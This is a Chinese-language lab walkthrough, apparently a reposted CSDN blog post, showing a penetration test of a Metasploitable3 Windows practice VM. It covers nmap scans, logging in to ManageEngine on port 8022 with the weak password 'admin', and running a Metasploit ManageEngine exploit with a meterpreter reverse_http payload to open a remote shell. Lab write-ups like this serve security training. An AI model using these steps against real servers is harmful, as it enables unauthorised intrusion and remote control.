MSTables3靶机渗透测试(1)- 攻击windows服务器

  • 链接:https://pan.baidu.com/s/1YNnoVbT-SPmvs3YawJpqjQ
    提取码:nx82
    解压文件后用VMware扫描即可
  • 靶机IP地址为192.168.118.4在这里插入图片描述
    攻击方为Kali Linux
    IP地址:192.168.118.1
    在这里插入图片描述
    1.信息收集
    nmap对其进行扫描
msf6 > db_nmap -sV -A -T4 192.168.118.4

在这里插入图片描述
2.查看可以利用的信息

msf6 > services 192.168.118.4

在这里插入图片描述

  • 接下来再全方位的扫一次(追加所有端口)
msf6 > db_nmap -sV -A -p 1-65535 192.168.118.4

在这里插入图片描述

  • 再次得到信息
    在这里插入图片描述
    3.尝试访问8022端口
    浏览器输入:http://192.168.118.4:8022
    在这里插入图片描述
  • 是一个继承桌面和设备管理软件
  • 使用弱口令admin可登录
    在这里插入图片描述
    4.接下来搜索可用于攻击的模块:manageengine
msf6 > search manageengine

在这里插入图片描述
共找到26个。

  • 使用第25
msf6 > use exploit/windows/http/manageengine_connectionid_write

在这里插入图片描述

  • 设置主机地址:
msf6 exploit(windows/http/manageengine_connectionid_write) > set rhosts 192.168.118.4
rhosts => 192.168.118.4

在这里插入图片描述

  • 再搜索:search reverse_http
msf6 exploit(windows/http/manageengine_connectionid_write) > search reverse_http

在这里插入图片描述

  • 使用第46
msf6 exploit(windows/http/manageengine_connectionid_write) > set payload payload/windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http

在这里插入图片描述

  • 设置端口
msf6 exploit(windows/http/manageengine_connectionid_write) > set rport 8022
rport => 8022

在这里插入图片描述

  • 开始
msf6 exploit(windows/http/manageengine_connectionid_write) > exploit

成功连接!
在这里插入图片描述

  • 输入windows命令ipconfig可查看信息
    在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/m0_53351713/article/details/114142477
今日推荐